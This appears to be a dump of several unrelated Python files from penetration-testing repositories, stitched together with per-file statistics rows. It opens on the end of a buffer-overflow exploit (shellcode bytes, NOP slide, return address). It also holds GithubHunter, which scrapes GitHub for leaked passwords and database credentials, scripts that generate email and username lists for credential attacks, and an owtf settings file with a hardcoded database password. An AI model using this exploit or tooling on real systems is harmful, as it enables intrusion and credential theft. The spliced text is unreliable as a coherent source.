buf += "\xe2\xe0\xfa\xf8\x6e\x88\x15\xa3\x75\xa8\x42\xab\x26"
buf += "\x10\xaf\xb6\x65\xf2\x29\xd0\x36\x96\x4c\xb6\x76\xf6"
buf += "\x0b\x05\xa0\xf3\x68\x84\x7a\xad\x36\x0c\x04\xa2\x11"
buf += "\x45\x3d\x13\x6c\x98\x07\xf7\x66\xaf\x1d\xa8\x10\xb2"
buf += "\xe7\x7e\x1b\x8b\x3d\x21\xa5\xf5\x6b\x99\x49\xdc\x75"
buf += "\xa8\x43"
## Building the padding between buffer overflow start and return address
padding = 'B' * (payload_length - nop_length - len(buf))
#perfect
print nop_slide + buf + padding + return_address
| 31.65 | 72 | 0.710345 |
owtf | from owtf.config import config_handler
from owtf.plugin.params import plugin_params
from owtf.protocols.smb import SMB
DESCRIPTION = "Mounts and/or uploads/downloads files to an SMB share -i.e. for IDS testing-"
def run(PluginInfo):
Content = []
smb = SMB()
args = {
"Description": DESCRIPTION,
"Mandatory": {
"SMB_HOST": config_handler.get_val("SMB_HOST_DESCRIP"),
"SMB_SHARE": config_handler.get_val("SMB_SHARE_DESCRIP"),
"SMB_MOUNT_POINT": config_handler.get_val("SMB_MOUNT_POINT_DESCRIP"),
},
"Optional": {
"SMB_USER": config_handler.get_val("SMB_USER_DESCRIP"),
"SMB_PASS": config_handler.get_val("SMB_PASS_DESCRIP"),
"SMB_DOWNLOAD": config_handler.get_val("SMB_DOWNLOAD_DESCRIP"),
"SMB_UPLOAD": config_handler.get_val("SMB_UPLOAD_DESCRIP"),
"REPEAT_DELIM": config_handler.get_val("REPEAT_DELIM_DESCRIP"),
},
}
for args in plugin_params.get_args(args, PluginInfo):
plugin_params.set_config(args) # Sets the auxiliary plugin arguments as config
smb.Mount(args, PluginInfo)
smb.Transfer()
if not smb.IsClosed(): # Ensure clean exit if reusing connection
smb.UnMount(PluginInfo)
return Content
| 37.205882 | 92 | 0.6302 |
PenetrationTestingScripts | # -*- coding: utf-8 -*-
import configparser
import os
import re
import smtplib
import sqlite3
import sys
import traceback
from email import encoders
from email.header import Header
from email.mime.base import MIMEBase
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.utils import formataddr, parseaddr
from time import gmtime, sleep, strftime
import requests
from lxml import etree
from lxml.html import tostring
from tqdm import tqdm
'''
工具名:GithubHunter
作者:Allen_Zhang
主要用途:本工具主要是查询Github中可能泄露的代码,用户名,密码,数据库信息,网络结构信息等
实现方法:通过登陆Github后,搜索关键词,然后呈现数据
'''
def login_github(username,password):#登陆Github
#初始化参数
login_url = 'https://github.com/login'
session_url = 'https://github.com/session'
try:
#获取session
s = requests.session()
resp = s.get(login_url).text
dom_tree = etree.HTML(resp)
key = dom_tree.xpath('//input[@name="authenticity_token"]/@value')
user_data = {
'commit': 'Sign in',
'utf8': '✓',
'authenticity_token': key,
'login': username,
'password': password
}
#发送数据并登陆
s.post(session_url,data=user_data)
s.get('https://github.com/settings/profile')
return s
except Exception as e:
print('产生异常,请检查网络设置及用户名和密码')
error_Record(str(e), traceback.format_exc())
def hunter(gUser, gPass, keywords):#根据关键词获取想要查询的内容
print('''\033[1;34;0m ##### # #
# # # ##### # # # # ##### # # # # # # ##### ###### #####
# # # # # # # # # # # # # ## # # # # #
# #### # # ###### # # ##### ####### # # # # # # ##### # #
# # # # # # # # # # # # # # # # # # # #####
# # # # # # # # # # # # # # # ## # # # #
##### # # # # #### ##### # # #### # # # ###### # # V1.2
Created by Allen \r\n\r\n\033[0m''')
global codes
global tUrls
try:
#代码搜索
s = login_github(gUser,gPass)
print('登陆成功,正在检索泄露信息.......')
sleep(1)
codes = []
tUrls = []
#新加入2条正则匹配,第一条匹配搜索出来的代码部分;第二条则进行高亮显示关键词
pattern_code = re.compile(r'<div class="file-box blob-wrapper">(.*?)</div>', re.S)
pattern_sub = re.compile(r'<em>', re.S)
for keyword in keywords:
for page in tqdm(range(1,7)):
#更改搜索排序方式的url,收录可能存在泄漏的url还是使用xpath解析
search_code = 'https://github.com/search?o=desc&p=' + str(page) + '&q=' + keyword +'&s=indexed&type=Code'
resp = s.get(search_code)
results_code = resp.text
dom_tree_code = etree.HTML(results_code)
#获取存在信息泄露的链接地址
Urls = dom_tree_code.xpath('//div[@class="flex-auto min-width-0 col-10"]/a[2]/@href')
for url in Urls:
url = 'https://github.com' + url
tUrls.append(url)
#获取代码部分,先获得整个包含泄露代码的最上层DIV对象,再把对象进行字符化,便于使用正则进行匹配泄露代码部分的div
results = dom_tree_code.xpath('//div[@class="code-list-item col-12 py-4 code-list-item-public "]')
for div in results:
result = etree.tostring(div, pretty_print=True, method="html")
code = str(result, encoding='utf-8')
#如果存在<div class="file-box blob-wrapper">此标签则匹配泄露的关键代码部分,不存在则为空。
if '<div class="file-box blob-wrapper">' in code:
data = pattern_code.findall(code)
codes.append(pattern_sub.sub('<em style="color:red">', data[0]))
else:
codes.append(' ')
return tUrls, codes
except Exception as e:
#如发生错误,则写入文件并且打印出来
error_Record(str(e), traceback.format_exc())
print(e)
def insert_DB(url, code):
try:
conn = sqlite3.connect('hunter.db')
cursor = conn.cursor()
cursor.execute('CREATE TABLE IF NOT EXISTS Baseline (url varchar(1000) primary key, code varchar(10000))')
cursor.execute('INSERT OR REPLACE INTO Baseline (url, code) values (?,?)', (url, code))
cursor.close
conn.commit()
conn.close()
except Exception as e:
print("数据库操作失败!\n")
error_Record(str(e), traceback.format_exc())
print(e)
def compare_DB_Url(url):
try:
con = sqlite3.connect('hunter.db')
cur = con.cursor()
cur.execute('SELECT url from Baseline where url = ?', (url,))
results = cur.fetchall()
cur.close()
con.commit()
con.close()
return results
except Exception as e:
error_Record(str(e), traceback.format_exc())
print(e)
def error_Record(error, tb):
try:
if os.path.exists('error.txt'):
with open('error.txt', 'a', encoding='utf-8') as f:
f.write(strftime("%a, %d %b %Y %H:%M:%S",gmtime()) + "-" + "Exception Record: " + error + '\n' + "具体错误信息如下:\n" +tb + '\r\n')
else:
with open('error.txt', 'w', encoding='utf-8') as f:
f.write(strftime("%a, %d %b %Y %H:%M:%S",gmtime()) + "-" + "Exception Record: " + error + '\n' + "具体错误信息如下:\n" +tb + '\r\n')
except Exception as e:
print(e)
def send_mail(host, username, password, sender, receivers, message):
def _format_addr(s):
name,addr = parseaddr(s)
return formataddr((Header(name,'utf-8').encode(),addr))
msg = MIMEText(message, 'html', 'utf-8')
subject = 'Github信息泄露监控通知'
msg['Subject'] = Header(subject, 'utf-8').encode()
msg['From'] = _format_addr('Github信息泄露监控<%s>' % sender)
msg['To'] = ','.join(receivers)
try:
smtp_obj = smtplib.SMTP(host, 25)
smtp_obj.login(username, password)
smtp_obj.sendmail(sender, receivers, msg.as_string())
print('邮件发送成功!')
smtp_obj.close()
except Exception as err:
error_Record(str(err), traceback.format_exc())
print(err)
if __name__ == '__main__':
config = configparser.ConfigParser()
config.read('info.ini')
g_User = config['Github']['user']
g_Pass = config['Github']['password']
host = config['EMAIL']['host']
m_User = config['EMAIL']['user']
m_Pass = config['EMAIL']['password']
m_sender = config['SENDER']['sender']
receivers = []
for k in config['RECEIVER']:
receivers.append(config['RECEIVER'][k])
keywords = []
#组合关键词,keyword + payload,两者之间加入“+”号,符合Github搜索语法
for keyword in config['KEYWORD']:
for payload in config['PAYLOADS']:
keywords.append(config['KEYWORD'][keyword] + '+' + config['PAYLOADS'][payload])
message = 'Dear all<br><br>未发现任何新增敏感信息!'
tUrls, codes= hunter(g_User, g_Pass, keywords)
target_codes = []
#第一次运行会查找是否存在数据文件,如果不存在则新建,存在则进行新增条目查找
if os.path.exists('hunter.db'):
print("存在数据库文件,进行新增数据查找......")
#拆分关键词,在泄露的代码中查找关键词和payload.如果两者都存在则进行下一步数据库查找
for keyword in keywords:
payload = keyword.split('+')
for i in range(0, len(tUrls)):
if (payload[0] in codes[i]) and (payload[1] in codes[i]):
#如果数据库中返回的值为空,则说明该条目在数据库中不存在,那么添加到target_codes里面用户发送邮件,并且添加到数据库中
if not compare_DB_Url(tUrls[i]):
target_codes.append('<br><br><br>' + '链接:' + tUrls[i] + '<br><br>')
target_codes.append('简要代码如下:<br><div style="border:1px solid #bfd1eb;background:#f3faff">' + codes[i] + '</div>')
insert_DB(tUrls[i], codes[i])
else:
print("未发现数据库文件,创建并建立基线......")
for keyword in keywords:
payload = keyword.split('+')
for i in range(0, len(tUrls)):
#关键词和payload同时存在则加入到target_codes,并写入数据库
if (payload[0] in codes[i]) and (payload[1] in codes[i]):
target_codes.append('<br><br><br>' + '链接:' +tUrls[i] + '<br><br>')
target_codes.append('简要代码如下:<br><div style="border:1px solid #bfd1eb;background:#f3faff">' + codes[i] + '</div>')
insert_DB(tUrls[i], codes[i])
#当target_codes有数据时,则进行邮件预警
if target_codes:
warning = ''.join(target_codes)
result = 'Dear all<br><br>发现信息泄露! ' + '一共发现{}条'.format(int(len(target_codes)/2)) + warning
send_mail(host, m_User, m_Pass, m_sender, receivers, result)
else:
send_mail(host, m_User, m_Pass, m_sender, receivers, message)
| 39.090909 | 140 | 0.524663 |
cybersecurity-penetration-testing | import sys
if len(sys.argv) !=3:
print "usage: %s name.txt email suffix" % (sys.argv[0])
sys.exit(0)
for line in open(sys.argv[1]):
name = ''.join([c for c in line if c == " " or c.isalpha()])
tokens = name.lower().split()
fname = tokens[0]
lname = tokens[-1]
print fname +lname+sys.argv[2]
print lname+fname+sys.argv[2]
print fname+"."+lname+sys.argv[2]
print lname+"."+fname+sys.argv[2]
print lname+fname[0]+sys.argv[2]
print fname+lname+fname+sys.argv[2]
print fname[0]+lname+sys.argv[2]
print fname[0]+"."+lname+sys.argv[2]
print lname[0]+"."+fname+sys.argv[2]
print fname+sys.argv[2]
print lname+sys.argv[2] | 29.047619 | 61 | 0.660317 |
owtf | """
owtf.settings
~~~~~~~~~~~~~
It contains all the owtf global configs.
"""
import os
import re
try:
FileNotFoundError
except NameError:
FileNotFoundError = IOError
import yaml
HOME_DIR = os.path.expanduser("~")
OWTF_CONF = os.path.join(HOME_DIR, ".owtf")
ROOT_DIR = os.path.dirname(os.path.realpath(__file__))
CONFIG_DIR = os.path.join(ROOT_DIR, "data", "conf")
DEBUG = True
# Used by tools like dirbuster to launch gui or cli versions
INTERACTIVE = True
# Database config when used in docker
if os.environ.get("DOCKER", None):
DATABASE_NAME = os.environ["POSTGRES_DB"]
DATABASE_PASS = os.environ["POSTGRES_PASSWORD"]
DATABASE_USER = os.environ["POSTGRES_USER"]
DATABASE_IP = "db"
DATABASE_PORT = 5432
else:
# Change this if you deploy OWTF to a public facing server
DATABASE_PASS = "jgZKW33Q+HZk8rqylZxaPg1lbuNGHJhgzsq3gBKV32g="
DATABASE_NAME = "owtf_db"
DATABASE_USER = "owtf_db_user"
DATABASE_IP = os.environ.get("POSTGRES_HOST","127.0.0.1")
DATABASE_PORT = 5432
# API and UI Server
SERVER_ADDR = "0.0.0.0"
SERVER_PORT = 8009
FILE_SERVER_PORT = 8010
# Default API version
DEFAULT_API_VERSION = "v1"
# Application secret
# Change this
APP_SECRET = "changeme"
SESSION_COOKIE_NAME = "owtf-session"
# CORS settings. Fine grained, do not override if possible.
SIMPLE_HEADERS = ["accept", "accept-language", "content-language"]
ALLOWED_ORIGINS = ["http:/localhost:8009", "http://localhost:8010"]
ALLOWED_METHODS = ["GET", "POST", "DELETE"]
SEND_CREDENTIALS = False
# ERROR reporting
USE_SENTRY = False
SENTRY_API_KEY = ""
# IMP PATHS
WEB_TEST_GROUPS = os.path.join(OWTF_CONF, "conf", "profiles", "plugin_web", "groups.cfg")
NET_TEST_GROUPS = os.path.join(OWTF_CONF, "conf", "profiles", "plugin_net", "groups.cfg")
AUX_TEST_GROUPS = os.path.join(OWTF_CONF, "conf", "profiles", "plugin_aux", "groups.cfg")
PLUGINS_DIR = os.path.join(ROOT_DIR, "plugins")
# Output Settings
OUTPUT_PATH = "owtf_review"
AUX_OUTPUT_PATH = "owtf_review/auxiliary"
NET_SCANS_PATH = "owtf_review/scans"
# The name of the directories relative to output path
TARGETS_DIR = "targets"
WORKER_LOG_DIR = "logs"
# Default profile settings
DEFAULT_GENERAL_PROFILE = os.path.join(OWTF_CONF, "conf", "general.yaml")
DEFAULT_FRAMEWORK_CONFIG = os.path.join(OWTF_CONF, "conf", "framework.yaml")
DEFAULT_RESOURCES_PROFILE = os.path.join(OWTF_CONF, "conf", "resources.cfg")
DEFAULT_WEB_PLUGIN_ORDER_PROFILE = os.path.join(OWTF_CONF, "conf", "profiles", "plugin_web", "order.cfg")
DEFAULT_NET_PLUGIN_ORDER_PROFILE = os.path.join(OWTF_CONF, "conf", "profiles", "plugin_net", "order.cfg")
# logs_dir can be both relative or absolute path ;)
LOGS_DIR = "logs"
# Used for logging in OWTF
OWTF_LOG_FILE = "/tmp/owtf.log"
# Interface static folders
TEMPLATES = os.path.join(OWTF_CONF, "build")
STATIC_ROOT = os.path.join(OWTF_CONF, "build")
# SMTP (Make changes here to setup SMTP server of your choice)
EMAIL_FROM = None # Your SMTP From Mail
SMTP_LOGIN = None # Your SMTP Login
SMTP_PASS = None # Your Password
SMTP_HOST = None # Your Mail Server
SMTP_PORT = None # Your SMTP Port
# OUTBOUND PROXY
USE_OUTBOUND_PROXY = False
OUTBOUND_PROXY_IP = ""
OUTBOUND_PROXY_PORT = ""
OUTBOUND_PROXY_AUTH = None
# Inbound Proxy Configuration
INBOUND_PROXY_IP = "127.0.0.1"
INBOUND_PROXY_PORT = 8008
INBOUND_PROXY_PROCESSES = 0
INBOUND_PROXY_CACHE_DIR = "/tmp/owtf/proxy-cache"
CA_CERT = os.path.join(OWTF_CONF, "proxy", "certs", "ca.crt")
CA_KEY = os.path.join(OWTF_CONF, "proxy", "certs", "ca.key")
CA_PASS_FILE = os.path.join(OWTF_CONF, "proxy", "certs", "ca_pass.txt")
CERTS_FOLDER = os.path.join(OWTF_CONF, "proxy", "certs")
BLACKLIST_COOKIES = ["_ga", "__utma", "__utmb", "__utmc", "__utmz", "__utmv"]
WHITELIST_COOKIES = ""
PROXY_RESTRICTED_RESPONSE_HEADERS = [
"Content-Length",
"Content-Encoding",
"Etag",
"Transfer-Encoding",
"Connection",
"Vary",
"Accept-Ranges",
"Pragma",
]
PROXY_RESTRICTED_REQUEST_HEADERS = [
"Connection",
"Pragma",
"Cache-Control",
"If-Modified-Since",
]
PROXY_LOG = "/tmp/owtf/proxy.log"
# Define regex patterns
REGEXP_FILE_URL = (
"^[^\?]+\.(xml|exe|pdf|cs|log|inc|dat|bak|conf|cnf|old|zip|7z|rar|tar|gz|bz2|txt|xls|xlsx|doc|docx|ppt|pptx)$"
)
# Potentially small files will be retrieved for analysis
REGEXP_SMALL_FILE_URL = "^[^\?]+\.(xml|cs|inc|dat|bak|conf|cnf|old|txt)$"
REGEXP_IMAGE_URL = "^[^\?]+\.(jpg|jpeg|png|gif|bmp)$"
REGEXP_VALID_URL = "^[^\?]+\.(shtml|shtm|stm)$"
REGEXP_SSI_URL = "^(http|ftp)[^ ]+$"
REGEXP_PASSWORD = "^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)(?=.*[@$!%*#?&])[A-Za-z\d@$!#%*?&]{8,20}$"
REGEXP_EMAIL = "^[a-z0-9]+[\._]?[a-z0-9]+[@]\w+[-]?\w+[.]\w{2,3}$"
# Compile regular expressions once at the beginning for speed purposes:
is_file_regex = re.compile(REGEXP_FILE_URL, re.IGNORECASE)
is_small_file_regex = re.compile(REGEXP_SMALL_FILE_URL, re.IGNORECASE)
is_image_regex = re.compile(REGEXP_IMAGE_URL, re.IGNORECASE)
is_url_regex = re.compile(REGEXP_VALID_URL, re.IGNORECASE)
is_ssi_regex = re.compile(REGEXP_SSI_URL, re.IGNORECASE)
is_password_valid_regex = re.compile(REGEXP_PASSWORD)
is_email_valid_regex = re.compile(REGEXP_EMAIL, re.IGNORECASE)
# UI
SERVER_LOG = "/tmp/owtf/ui_server.log"
FILE_SERVER_LOG = "/tmp/owtf/file_server.log"
# HTTP_AUTH
HTTP_AUTH_HOST = None
HTTP_AUTH_USERNAME = None
HTTP_AUTH_PASSWORD = None
HTTP_AUTH_MODE = "basic"
# Memory
RESOURCE_MONITOR_PROFILER = 0
PROCESS_PER_CORE = 1
MIN_RAM_NEEDED = 20
# misc
DATE_TIME_FORMAT = "%d/%m/%Y-%H:%M"
REPLACEMENT_DELIMITER = "@@@"
REPLACEMENT_DELIMITER_LENGTH = len(REPLACEMENT_DELIMITER)
CONFIG_TYPES = ["string", "other"]
USER_AGENT = "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/15.0"
PROXY_CHECK_URL = "http://www.google.ie"
# Fallback
FALLBACK_WEB_TEST_GROUPS = os.path.join(ROOT_DIR, "data", "conf", "profiles", "plugin_web", "groups.cfg")
FALLBACK_NET_TEST_GROUPS = os.path.join(ROOT_DIR, "data", "conf", "profiles", "plugin_net", "groups.cfg")
FALLBACK_AUX_TEST_GROUPS = os.path.join(ROOT_DIR, "data", "conf", "profiles", "plugin_aux", "groups.cfg")
FALLBACK_PLUGINS_DIR = os.path.join(ROOT_DIR, "data", "plugins")
FALLBACK_GENERAL_PROFILE = os.path.join(ROOT_DIR, "data", "conf", "general.yaml")
FALLBACK_FRAMEWORK_CONFIG = os.path.join(ROOT_DIR, "data", "conf", "framework.yaml")
FALLBACK_RESOURCES_PROFILE = os.path.join(ROOT_DIR, "data", "conf", "resources.cfg")
FALLBACK_WEB_PLUGIN_ORDER_PROFILE = os.path.join(ROOT_DIR, "data", "conf", "profiles", "plugin_web", "order.cfg")
FALLBACK_NET_PLUGIN_ORDER_PROFILE = os.path.join(ROOT_DIR, "data", "conf", "profiles", "plugin_net", "order.cfg")
# Override the values
local_conf = os.path.join(OWTF_CONF, "settings.py")
try:
with open(local_conf) as f:
settings = compile(f.read(), local_conf, "exec")
exec(settings, globals(), locals())
except FileNotFoundError:
pass
# JWT
JWT_SECRET_KEY = "changeme" # Add your JWT_SECRET_KEY here
JWT_ALGORITHM = "HS256"
JWT_EXP_DELTA_SECONDS = 60 * 60 * 24
JWT_OPTIONS = {
"verify_signature": True,
"verify_exp": True,
"verify_nbf": False,
"verify_iat": True,
"verify_aud": False,
}
| 32.111111 | 114 | 0.682003 |
owtf | #!/usr/bin/env python
from six import iteritems
import os
import yaml
import yamlordereddictloader
BLUE = "\033[94m"
GREEN = "\033[92m"
WARNING = "\033[93m"
FAIL = "\033[91m"
RESET = "\033[0m"
CURR_DIR = os.path.dirname(os.path.realpath(__file__))
OWTF_CONF = os.path.join(os.path.expanduser("~"), ".owtf")
with open(os.path.join(CURR_DIR, "tools.yaml"), "r") as f:
conf = yaml.load(f, Loader=yamlordereddictloader.Loader)
def create_directory(directory):
"""Create parent directories as necessary.
:param directory: (~str) Path of directory to be made.
:return: True - if directory is created, and False - if not.
"""
try:
os.makedirs(directory)
return True
except OSError:
# Checks if the folder is empty
if not os.listdir(directory):
return True
return False
def install_in_directory(directory, command):
"""Execute a certain command while staying inside one directory.
:param directory: (~str) Path of directory in which installation command has to be executed.
:param command: (~str) Linux shell command (most likely `wget` here)
:return: True - if installation successful or directory already exists, and False if not.
"""
if create_directory(directory):
print(BLUE + "[*] Switching to {}".format(directory) + RESET)
os.chdir(directory)
os.system(command)
else:
print(WARNING + "[!] Directory {} already exists, so skipping installation for this".format(directory) + RESET)
def parse_and_install():
for k, v in iteritems(conf):
cmd = v["command"]
directory = os.path.join(OWTF_CONF, v["directory"])
print(BLUE + "[*] Running {0} in {1}".format(cmd, directory) + RESET)
install_in_directory(directory, cmd)
if __name__ == "__main__":
parse_and_install()
| 28.444444 | 119 | 0.649407 |
PenetrationTestingScripts | # Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
from . import win32
# from wincon.h
class WinColor(object):
BLACK = 0
BLUE = 1
GREEN = 2
CYAN = 3
RED = 4
MAGENTA = 5
YELLOW = 6
GREY = 7
# from wincon.h
class WinStyle(object):
NORMAL = 0x00 # dim text, dim background
BRIGHT = 0x08 # bright text, dim background
BRIGHT_BACKGROUND = 0x80 # dim text, bright background
class WinTerm(object):
def __init__(self):
self._default = win32.GetConsoleScreenBufferInfo(win32.STDOUT).wAttributes
self.set_attrs(self._default)
self._default_fore = self._fore
self._default_back = self._back
self._default_style = self._style
# In order to emulate LIGHT_EX in windows, we borrow the BRIGHT style.
# So that LIGHT_EX colors and BRIGHT style do not clobber each other,
# we track them separately, since LIGHT_EX is overwritten by Fore/Back
# and BRIGHT is overwritten by Style codes.
self._light = 0
def get_attrs(self):
return self._fore + self._back * 16 + (self._style | self._light)
def set_attrs(self, value):
self._fore = value & 7
self._back = (value >> 4) & 7
self._style = value & (WinStyle.BRIGHT | WinStyle.BRIGHT_BACKGROUND)
def reset_all(self, on_stderr=None):
self.set_attrs(self._default)
self.set_console(attrs=self._default)
def fore(self, fore=None, light=False, on_stderr=False):
if fore is None:
fore = self._default_fore
self._fore = fore
# Emulate LIGHT_EX with BRIGHT Style
if light:
self._light |= WinStyle.BRIGHT
else:
self._light &= ~WinStyle.BRIGHT
self.set_console(on_stderr=on_stderr)
def back(self, back=None, light=False, on_stderr=False):
if back is None:
back = self._default_back
self._back = back
# Emulate LIGHT_EX with BRIGHT_BACKGROUND Style
if light:
self._light |= WinStyle.BRIGHT_BACKGROUND
else:
self._light &= ~WinStyle.BRIGHT_BACKGROUND
self.set_console(on_stderr=on_stderr)
def style(self, style=None, on_stderr=False):
if style is None:
style = self._default_style
self._style = style
self.set_console(on_stderr=on_stderr)
def set_console(self, attrs=None, on_stderr=False):
if attrs is None:
attrs = self.get_attrs()
handle = win32.STDOUT
if on_stderr:
handle = win32.STDERR
win32.SetConsoleTextAttribute(handle, attrs)
def get_position(self, handle):
position = win32.GetConsoleScreenBufferInfo(handle).dwCursorPosition
# Because Windows coordinates are 0-based,
# and win32.SetConsoleCursorPosition expects 1-based.
position.X += 1
position.Y += 1
return position
def set_cursor_position(self, position=None, on_stderr=False):
if position is None:
# I'm not currently tracking the position, so there is no default.
# position = self.get_position()
return
handle = win32.STDOUT
if on_stderr:
handle = win32.STDERR
win32.SetConsoleCursorPosition(handle, position)
def cursor_adjust(self, x, y, on_stderr=False):
handle = win32.STDOUT
if on_stderr:
handle = win32.STDERR
position = self.get_position(handle)
adjusted_position = (position.Y + y, position.X + x)
win32.SetConsoleCursorPosition(handle, adjusted_position, adjust=False)
def erase_screen(self, mode=0, on_stderr=False):
# 0 should clear from the cursor to the end of the screen.
# 1 should clear from the cursor to the beginning of the screen.
# 2 should clear the entire screen, and move cursor to (1,1)
handle = win32.STDOUT
if on_stderr:
handle = win32.STDERR
csbi = win32.GetConsoleScreenBufferInfo(handle)
# get the number of character cells in the current buffer
cells_in_screen = csbi.dwSize.X * csbi.dwSize.Y
# get number of character cells before current cursor position
cells_before_cursor = csbi.dwSize.X * csbi.dwCursorPosition.Y + csbi.dwCursorPosition.X
if mode == 0:
from_coord = csbi.dwCursorPosition
cells_to_erase = cells_in_screen - cells_before_cursor
if mode == 1:
from_coord = win32.COORD(0, 0)
cells_to_erase = cells_before_cursor
elif mode == 2:
from_coord = win32.COORD(0, 0)
cells_to_erase = cells_in_screen
# fill the entire screen with blanks
win32.FillConsoleOutputCharacter(handle, ' ', cells_to_erase, from_coord)
# now set the buffer's attributes accordingly
win32.FillConsoleOutputAttribute(handle, self.get_attrs(), cells_to_erase, from_coord)
if mode == 2:
# put the cursor where needed
win32.SetConsoleCursorPosition(handle, (1, 1))
def erase_line(self, mode=0, on_stderr=False):
# 0 should clear from the cursor to the end of the line.
# 1 should clear from the cursor to the beginning of the line.
# 2 should clear the entire line.
handle = win32.STDOUT
if on_stderr:
handle = win32.STDERR
csbi = win32.GetConsoleScreenBufferInfo(handle)
if mode == 0:
from_coord = csbi.dwCursorPosition
cells_to_erase = csbi.dwSize.X - csbi.dwCursorPosition.X
if mode == 1:
from_coord = win32.COORD(0, csbi.dwCursorPosition.Y)
cells_to_erase = csbi.dwCursorPosition.X
elif mode == 2:
from_coord = win32.COORD(0, csbi.dwCursorPosition.Y)
cells_to_erase = csbi.dwSize.X
# fill the entire screen with blanks
win32.FillConsoleOutputCharacter(handle, ' ', cells_to_erase, from_coord)
# now set the buffer's attributes accordingly
win32.FillConsoleOutputAttribute(handle, self.get_attrs(), cells_to_erase, from_coord)
def set_title(self, title):
win32.SetConsoleTitle(title)
| 37.595092 | 95 | 0.615262 |
cybersecurity-penetration-testing | #!/usr/bin/env python
'''
Author: Christopher S. Duffy
Date: March 2015
Name: username_generator.py
Purpose: To generate a username list from the US Census Top 1000 surnames and other lists
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import sys
from collections import namedtuple
import string
import argparse
import os
try:
import xlrd
except:
sys.exit("[!] Please install the xlrd library: pip install xlrd")
def unique_list(list_sort, verbose):
noted = []
if verbose > 0:
print("[*] Removing duplicates while maintaining order")
[noted.append(item) for item in list_sort if not noted.count(item)] # List comprehension
return noted
def census_parser(filename, verbose):
# Create the named tuple
CensusTuple = namedtuple('Census', 'name, rank, count, prop100k, cum_prop100k, pctwhite, pctblack, pctapi, pctaian, pct2prace, pcthispanic')
# Define the location of the file and worksheet till arguments are developed
worksheet_name = "top1000"
#Define work book and work sheet variables
workbook = xlrd.open_workbook(filename)
spreadsheet = workbook.sheet_by_name(worksheet_name)
total_rows = spreadsheet.nrows - 1
current_row = -1
# Define holder for details
username_dict = {}
surname_dict = {}
alphabet = list(string.ascii_lowercase)
while current_row < total_rows:
row = spreadsheet.row(current_row)
current_row += 1
entry = CensusTuple(*tuple(row)) #Passing the values of the row as a tuple into the namedtuple
surname_dict[entry.rank] = entry
cellname = entry.name
cellrank = entry.rank
for letter in alphabet:
if "." not in str(cellrank.value):
if verbose > 1:
print("[-] Eliminating table headers")
break
username = letter + str(cellname.value.lower())
rank = str(cellrank.value)
username_dict[username] = rank
username_list = sorted(username_dict, key=lambda key: username_dict[key])
return(surname_dict, username_dict, username_list)
def username_file_parser(prepend_file, append_file, verbose):
if prepend_file:
put_where = "begin"
filename = prepend_file
elif append_file:
put_where = "end"
filename = append_file
else:
sys.exit("[!] There was an error in processing the supplemental username list!")
with open(filename) as file:
lines = [line.rstrip('\n') for line in file]
if verbose > 1:
if "end" in put_where:
print("[*] Appending %d entries to the username list") % (len(lines))
else:
print("[*] Prepending %d entries to the username list") % (len(lines))
return(lines, put_where)
def combine_usernames(supplemental_list, put_where, username_list, verbose):
if "begin" in put_where:
username_list[:0] = supplemental_list #Prepend with a slice
if "end" in put_where:
username_list.extend(supplemental_list)
username_list = unique_list(username_list, verbose)
return(username_list)
def write_username_file(username_list, filename, domain, verbose):
open(filename, 'w').close() #Delete contents of file name
if domain:
domain_filename = filename + "_" + domain
email_list = []
open(domain_filename, 'w').close()
if verbose > 1:
print("[*] Writing to %s") % (filename)
with open(filename, 'w') as file:
file.write('\n'.join(username_list))
if domain:
if verbose > 1:
print("[*] Writing domain supported list to %s") % (domain_filename)
for line in username_list:
email_address = line + "@" + domain
email_list.append(email_address)
with open(domain_filename, 'w') as file:
file.write('\n'.join(email_list))
return
if __name__ == '__main__':
# If script is executed at the CLI
usage = '''usage: %(prog)s [-c census.xlsx] [-f output_filename] [-a append_filename] [-p prepend_filename] [-d domain_name] -q -v -vv -vvv'''
parser = argparse.ArgumentParser(usage=usage)
parser.add_argument("-c", "--census", type=str, help="The census file that will be used to create usernames, this can be retrieved like so:\n wget http://www2.census.gov/topics/genealogy/2000surnames/Top1000.xls", action="store", dest="census_file")
parser.add_argument("-f", "--filename", type=str, help="Filename for output the usernames", action="store", dest="filename")
parser.add_argument("-a","--append", type=str, action="store", help="A username list to append to the list generated from the census", dest="append_file")
parser.add_argument("-p","--prepend", type=str, action="store", help="A username list to prepend to the list generated from the census", dest="prepend_file")
parser.add_argument("-d","--domain", type=str, action="store", help="The domain to append to usernames", dest="domain_name")
parser.add_argument("-v", action="count", dest="verbose", default=1, help="Verbosity level, defaults to one, this outputs each command and result")
parser.add_argument("-q", action="store_const", dest="verbose", const=0, help="Sets the results to be quiet")
parser.add_argument('--version', action='version', version='%(prog)s 0.42b')
args = parser.parse_args()
# Set Constructors
census_file = args.census_file # Census
filename = args.filename # Filename for outputs
verbose = args.verbose # Verbosity level
append_file = args.append_file # Filename for the appending usernames to the output file
